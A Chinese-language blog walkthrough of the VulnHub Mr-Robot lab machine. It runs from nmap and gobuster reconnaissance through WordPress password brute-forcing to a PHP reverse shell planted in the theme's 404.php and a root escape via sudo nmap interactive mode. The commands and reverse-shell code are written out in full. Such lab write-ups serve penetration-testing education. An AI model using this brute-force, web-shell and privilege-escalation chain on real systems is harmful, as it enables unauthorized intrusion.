尧图网络 高端网站定制 · 原创设计
免费咨询热线
400-888-6620
免费获取方案
VulnHub mrrobot靶机实战:从信息收集到WordPress渗透与Linux提权全解析
如果你玩过VulnHub上的老牌靶机肯定听过mrrobot的大名。这系列靶机灵感来自美剧《黑客军团》主角Elliot就是靠着一身Web渗透和Linux提权本事把一个个系统掀了个底朝天。这台机器在VulnHub上评分很高难度定位是入门到进阶整体链路非常干净信息收集、WordPress后台拿权限、Linux本地提权没有花里胡哨的内网横向特别适合刚学完渗透基础、想练手完整攻击链的人。本文我会从靶机导入开始完整走一遍三个flag的获取过程把每一步的考虑和坑都讲清楚。这台靶机的核心价值在于它可以帮你把“信息收集 → Web渗透 → 主机提权”这条主线一步步串起来。很多人学渗透的时候知识点是零散的会扫端口但不知道下一步干什么会看robots.txt但不知道里面藏着字典会猜后台密码但不知道密码就藏在字典里。mrrobot把这些小技巧环环相扣地串成了一条线练完它你对“攻击链”这个概念会有体感。文章会尽量照顾新手每个关键动作都会解释为什么这么做底层原理是什么同时也会讲讲我这台机上踩过的几个坑。1. 靶机环境搭建与攻击机准备1.1 下载与导入靶机镜像mrrobot是VulnHub上的一个虚拟机镜像格式为.ova下载后可以直接导入VirtualBox或VMware。建议使用VirtualBox兼容性比较稳。导入方式很简单打开VirtualBox选“管理 → 导入虚拟电脑”选择下载好的.ova文件一路下一步即可。如果导入时报错多半是版本兼容问题优先升级VirtualBox再试。导入完成后建议把网络模式设置为仅主机网络Host-Only或者NAT网络保证攻击机和靶机在同一个二层网络里。我个人的习惯是用仅主机网络因为NAT模式下虚拟机之间偶尔会出现互访不通的情况排查起来很浪费时间。如果你用VMware把两张虚拟网卡都设为仅主机模式即可。这一步的关键是攻击机通常是Kali和靶机必须在同一个网段后面才能扫到对方。提示靶机默认没有图形界面启动后就是一个纯命令行终端。不要觉得奇怪它正常状态就是这样的耐心等一两分钟等系统完全启动后再开始信息收集。1.2 攻击机环境与网段确认攻击机我用的是Kali Linux工具链齐全不用额外装什么。启动Kali后先确认两件事一是攻击机和靶机是否在同一网段二是能否ping通。ip a # 确认Kali的IP地址假设是192.168.56.102/24 # 用netdiscover扫描当前网段内的存活主机 sudo netdiscover -r 192.168.56.0/24netdiscover会列出网段内所有活跃设备的IP和MAC地址靶机的MAC地址通常是08:00:27开头VirtualBox专属厂商前缀一眼就能认出来。如果你用了桥接模式还可以用arp-scan -l扫描效果类似。靶机IP确认后先ping一下通了再继续。1.3 工具准备与目录规划整个过程中会用到的工具包括nmap端口扫描、gobuster或dirb目录枚举、wpscanWordPress漏洞扫描、Burp Suite可选用于手工测试、nc反弹shell监听、hashcat或john密码破解。这些工具Kali里都内置了不需要额外安装。建议在工作目录下建一个文件夹专门存放扫描结果和下载的文件方便后期复盘。比如mkdir ~/mrrobot cd ~/mrrobot2. 信息收集决定攻击成败的第一步2.1 端口扫描与主机发现信息收集是整个渗透测试的地基地基没打好后面全是碰运气。mrrobot的第一站就是端口扫描。很多人拿到靶机IP后喜欢直接访问80端口我建议先跑一轮完整的nmap扫描把全端口、版本信息、操作系统指纹都摸清楚。nmap -sV -sC -p- -T4 -oN nmap_full.txt target-ip几个参数的解释-sV探测端口服务版本方便判断后续利用方式。-sC运行默认脚本集包含一些常见的漏洞探测和banner抓取。-p-扫描1到65535所有端口虽然慢但能避免漏掉高位端口。-T4适度加速本地虚拟机网络环境下完全没问题。-oN保存结果为文本格式方便回看。这台靶机的扫描结果很典型22端口是过滤状态不是开放80和443开放跑的是HTTP和HTTPS操作系统大概率是Linux。看到22端口被filtered说明防火墙干预或者端口被做了限制这也提示我们不要把精力放在SSH爆破上它是故意关掉的。2.2 观察Web页面与robots.txt80端口开放直接curl看首页curl -I http://target-ip然后用浏览器访问你会看到一个带终端打字效果的小动画页面是用JavaScript做的一个交互界面看起来酷炫实际没有任何功能入口。很多人到这里会卡住不知道该点哪。正确的做法是回到命令行先看robots.txtcurl http://target-ip/robots.txtrobots.txt原本是给搜索引擎爬虫看的路由规则但在靶机里经常故意留下敏感路径。这台机器给出了两个关键信息/key-1-of-3.txt第一个flag。/fsocity.dic一个巨大的字典文件后面有大用处。curl下载第一个flagcurl http://target-ip/key-1-of-3.txt一个字符串形如{flag格式}保存好。这是第一把钥匙。很多人到这里觉得“哦拿了个flag”但fsocity.dic才是这关真正的重磅道具它是个超大字典后续登录后台全靠它。2.3 目录枚举找到隐藏的后台入口拿到了字典文件下一步就是目录枚举找Web应用的真实入口。常见工具是gobuster或dirb两者的原理一样都是拿字典去爆破网站的目录结构。我习惯用gobuster速度更快gobuster dir -u http://target-ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50扫描结果里会出现几个值得关注的路径其中最重要的是/wordpress。这里说明站点根目录是WordPress。另外还会看到/admin、/login这类路径但很多是死路径或者重定向到WordPress登录页。/wordpress才是真正的后台。访问http://target-ip/wordpress你会看到标准的WordPress站点此时攻击面已经明确这是一台跑着WordPress的主机接下来要围绕WordPress做文章。注意gobuster扫描时字典会跑很久fsocity.dic本身就有几十万行。如果你扫描目标明确直接用-x php限制扩展名能省不少时间。3. 突破口WordPress后台沦陷3.1 WordPress用户枚举与密码猜测拿到WordPress站点后第一个动作是枚举用户。WordPress有一个公开的“作者枚举”漏洞访问/?author1服务端会返回指定ID的用户名。也可以用wpscan直接枚举wpscan --url http://target-ip/wordpress --enumerate u跑完后会发现一个唯一的用户名admin。很好省去了猜用户名的时间直接用admin去爆破密码。爆破密码的字典用什么还记得fsocity.dic吗这个字典不只是目录字典它也可以当作用户密码字典来用。先看看它的行数wc -l fsocity.dic如果行数太多考虑到效率可以先做去重再爆破。这里有个细节很多WordPress爆破教程会推荐用wpscan --passwords但wpscan跑起来不算快用hydra也试过实际效果一般。我自己用的是脚本方式循环调用登录接口。不过为了保持文章通用性这里就按wpscan的方式演示# 先去重减少重复尝试次数 sort -u fsocity.dic -o fsocity-unique.dic # 用wpscan进行密码爆破 wpscan --url http://target-ip/wordpress -U admin -P fsocity-unique.dic --password-attack wp-login这个过程可能要等一会儿因为字典很大。耐心跑完后你会看到密码结果Berlin。没错这台靶机的后台密码就是它。3.2 利用WordPress主题编辑功能拿下Shell拿到后台账号密码后登录/wordpress/wp-admin。很多人进到后台就开始找漏洞插件但mrrobot这台机器的利用点不是插件而是主题编辑功能。在WordPress后台左侧菜单里找到“外观 → 主题编辑器”选一个当前启用的主题通常是twentyfifteen之类编辑它的404.php文件。把文件内容替换成一句话PHP木马或反弹shell代码。这里很多人会直接写一个常规的system($_GET[cmd])也可以但反弹Shell更稳定可以交互式执行命令不用一次次通过HTTP请求传递命令。反弹Shell的PHP代码网上有很多比如?php $sock fsockopen(你的Kali IP, 8888); $proc proc_open(/bin/sh -i, array(0$sock, 1$sock, 2$sock), $pipes); ?保存文件后攻击机这边先起一个监听nc -lvnp 8888然后浏览器访问http://target-ip/wordpress/wp-content/themes/twentyfifteen/404.php触发一次请求反弹shell就会连回你的监听端口。看到$符号出现的那一刻就是突破成功的标志。提示如果访问404.php没有触发可以先访问一个不存在的页面让Apache转移到404处理流程再刷新一次。这样能确保404模板执行。另外确认你Kali的IP地址在靶机能访问到的网段内不然反弹连不回来。4. 提权之路从www-data到root4.1 拿到Shell后的信息收集现在你是一个www-data权限的普通用户距离成功还差两个flag。提权前先做好基本信息收集id uname -a cat /etc/passwd/etc/passwd里可以看到一个robot用户这说明系统里还有另一个普通用户。这台靶机把第二个flag放在了/home/robot目录下。先看看ls -la /home/robot/你会看到两个关键文件key-2-of-3.txt和password.raw-md5。权限设置是意料之中的key-2-of-3.txt只能由robot用户读取password.raw-md5则是一个哈希文件所有用户都可以读。这个设计也非常经典把密码哈希暴露给攻击者让攻击者破解后获取普通用户权限再做sudo提权。它很好地演示了“拿到一个低权限shell只是开始提权靠的是细心的信息收集”。很多新手拿到www-datashell就不知道该干嘛了这里恰恰是整台靶机的分水岭。4.2 破解MD5密码拿到robot用户权限先看内容cat /home/robot/password.raw-md5输出是一串MD5哈希典型格式如c3f4a...材料里给的解码结果是abcdefghijklmnopqrstuvwxyz。用john或hashcat都可以解字典直接指向Kali自带的小字典john --formatraw-md5 --wordlist/usr/share/wordlists/rockyou.txt password.raw-md5如果rockyou是压缩包先解压。破解出密码后切换用户su robot看到robotlinux的提示符说明你已经拿到了普通用户权限。这个时候读取key-2-of-3.txtcat /home/robot/key-2-of-3.txt第二把钥匙到手。4.3 发现SUID或sudo提权路径有了robot用户开始查sudo权限sudo -l输出如果显示(ALL) NOPASSWD: /usr/local/bin/nmap或者类似这样那就意味着我们可以用root身份运行nmap。旧版nmap有一个交互模式可以用来逃逸到系统shellsudo nmap --interactive进入nmap交互模式后执行!sh如果运气好你会直接得到一个root shell。这一招在nmap 5.x时代非常经典也是mrrobot设计好的提权路径。但它有一个前提nmap版本必须支持交互模式且sudo配置允许以root运行nmap。现代发行版里的nmap早就移除了交互模式所以这个洞只能在这种刻意配置的靶机上生效。4.4 读取最终flag与复盘拿到root shell后直接读取root目录下的最后一个flagcat /root/key-3-of-3.txt三个flag凑齐整台机器通关。为了加深理解建议通关后做两件事一是把整个攻击链路画一遍流程图从信息收集到root提权的每一步都标清楚二是到VulnHub上看别人的writeup对比自己的思路和别人的差异点。你会发现mrrobot之外的靶机还有大量类似套路但理解了这条主线后再做别的靶机就有种“不过如此”的感觉了。5. 常见问题与排查技巧实录5.1 靶机导入后无法开机mrrobot是.ova格式VirtualBox导入后偶尔会出现“不能为虚拟机打开一个新任务”的报错。常见原因是虚拟化技术冲突尤其是Windows上Hyper-V与VirtualBox不兼容。解决方法是关闭Hyper-V功能或者在BIOS里开启VT-x。如果启动后卡在命令行没有任何输出先等两分钟有些虚拟机初始化比较慢不是死机。5.2 反弹shell连不上反弹Shell连不上的原因通常有三个一是攻击机和靶机不在同一个网络段检查网卡模式二是Kali的防火墙拦截了入站连接临时关掉sudo ufw disable三是监听端口写错了或触发路径不对。建议在浏览器访问404.php的时候用Burp Suite或curl带一次请求方便观察服务端是否真的执行了PHP代码。5.3 字典爆破速度太慢fsocity.dic有几十万行直接拿去wpscan爆破可能要跑很久。可以先去重sort -u fsocity.dic -o fsocity-unique.dic去重后行数会大幅减少。另外如果明确密码是纯小写字母也可以先用grep过滤出只包含小写字母的行能进一步缩小范围提升效率。5.4 WordPress后台登录不了如果密码爆破成功但登录后跳转到了“需要更高权限”页面先检查一下登录地址是不是/wordpress/wp-login.php以及有没有开启https强制跳转。443端口虽然开放但不需要80端口的WordPress后台才是正主。6. 从靶机练习到实战思维几个值得沉淀的习惯最后聊几句题外话。打通mrrobot之后我还反复玩过几次每次都有新收获。第一次只是照猫画虎把命令敲了一遍第二次就开始思考每个环节为什么存在为什么fsocity.dic会出现在robots.txt为什么后台密码是弱密码为什么nmap被配置成sudo免密第三次再玩我开始把思路迁移到真实环境的渗透测试中。一个特别有价值的习惯是每次拿到shell后都认真记录“当前权限可以访问哪些资源、系统里有哪些不合理的配置、哪些文件是非默认的”。真实渗透里提权靠的往往不是某个0day而是系统里一个被遗忘的备份文件、一个配置错误的日志目录、一个没删干净的测试脚本。mrrobot把这些“不合理的配置”埋得很明显正好培养这种敏感度。另外一个习惯是“留痕复盘”。每做完一个靶机我都会用Markdown写一个简短的渗透测试报告内容包括目标IP、开放端口、漏洞成因、攻击步骤、获取的flag、提权路径。这个习惯坚持下来后我做新靶机的速度提升了很多因为很多套路其实是一通百通的。说实话mrrobot并不能让你一步登天学会高深的内网渗透但它绝对是一台值得反复咀嚼的入门神机。你会在这里第一次体会到“原来这样也能进后台”第一次感受到“从www-data到root的瞬间心跳加速”。练完它再去碰DC系列、HackTheBox上的Easy级别机器你会发现自己的攻击思路清晰了很多。踩过的坑越多下次踩坑的概率就越低这是打靶场唯一不变的真理。
RELATED

相关推荐

在 awesome-codex-skills 中评估与接入 Zoho Desk 自动化:基于 Rube MCP 的工具发现、连接与替代方案实战

在 awesome-codex-skills 中评估与接入 Zoho Desk 自动化:基于 Rube MCP 的工具发现、连接与替代方案实战

在 awesome-codex-skills 中评估与接入 Zoho Desk 自动化:基于 Rube MCP 的工具发现、连接与替代方案实战 【免费下载链接】awesome-codex-skills A curated list of practical Codex skills for automating workflows across the Codex CLI and API. 项目地址: h…

📅 2026/9/15 19:40:41
SpringBoot多数据源切换实战:dynamic-datasource配置、动态添加与坑位解析

SpringBoot多数据源切换实战:dynamic-datasource配置、动态添加与坑位解析

简介:针对Spring Boot项目在多数据源场景下的实际需求,这份示例代码演示了如何利用dynamic-datasource框架对MySQL与SQLServer进行手动切换,适合需要整合异构数据库的中级Spring Boot开发者参考。压缩包共23个文件,其中17个Java源…

📅 2026/9/15 19:40:41
Python图书馆大数据可视化系统:PySpark+Dash实战

Python图书馆大数据可视化系统:PySpark+Dash实战

简介:本资源是一个面向高校课程设计与Python后端开发初学者的图书馆大数据可视化分析系统,旨在帮助图书馆管理者洞察运营数据、优化服务策略,同时为学习者提供完整的数据分析与可视化实战项目。压缩包共45.03MB,含完整Python源码&…

📅 2026/9/15 19:40:41
MORE NEWS

更多资讯

📰

FMEA-MSR功能分析实战:从监视到响应,避开六大坑

做FMEA-MSR项目的时候,最容易被低估、也最容易返工的就是步骤三“功能分析”。我说句实在话,很多团队把MSR当成普通DFMEA的变体来处理,结果功能清单列出来的还是一堆“正常功能”,完全没有把“监视”和“响应”这两条主线拆进去。…

📰

pytest 在 CI 环境中的自动检测与短摘要输出行为详解

pytest 在 CI 环境中的自动检测与短摘要输出行为详解 【免费下载链接】pytest The pytest framework makes it easy to write small tests, yet scales to support complex functional testing 项目地址: https://gitcode.com/GitHub_Trending/py/pytest 导读 本文聚焦…

📰

Zemax光学设计全流程:从需求到公差分析实战指南

接到一个镜头设计任务,客户只有一句话:“要看得清。”焦距多少、口径多大、工作在哪个波段、像面用多大探测器,统统没提。这时候如果打开Zemax就开始堆镜片,那基本等于拿大炮打蚊子转圈,折腾到半夜也得不到能用的结果。…

📰

如何永久保存微信聊天记录:WeChatMsg导出与年度聊天报告完整入门指南

如何永久保存微信聊天记录:WeChatMsg导出与年度聊天报告完整入门指南 【免费下载链接】WeChatMsg 提取微信聊天记录,将其导出成HTML、Word、CSV文档永久保存,对聊天记录进行分析生成年度聊天报告 项目地址: https://gitcode.com/GitHub_Tre…

📰

Audacity 的 StretchingSequence 如何实现反向与随机采样访问?

Audacity 的 StretchingSequence 如何实现反向与随机采样访问? 【免费下载链接】audacity Audio Editor 项目地址: https://gitcode.com/GitHub_Trending/au/audacity 如果你在阅读或扩展 Audacity 新一代 au3 架构中的变速变调(time-and-pitch&…

📰

2026年3款降AI率软件实测对比,降AI率下不来必看

最近在学术圈经常听到这样的抱怨:明明是自己写的论文,AIGC检测却显示80%以上AI生成;查重率怎么也降不到学校要求的15%以下;盲审前夕熬夜改到词穷,却越改越乱。如果你也面临这样的困境,别着急,本…

TODAY

今日更新

THIS WEEK

本周精选

THIS MONTH

本月热门

读完文章,想聊聊您的网站?

告诉我们您的行业与需求,资深顾问一对一梳理方案与报价,全程免费。

📞 💬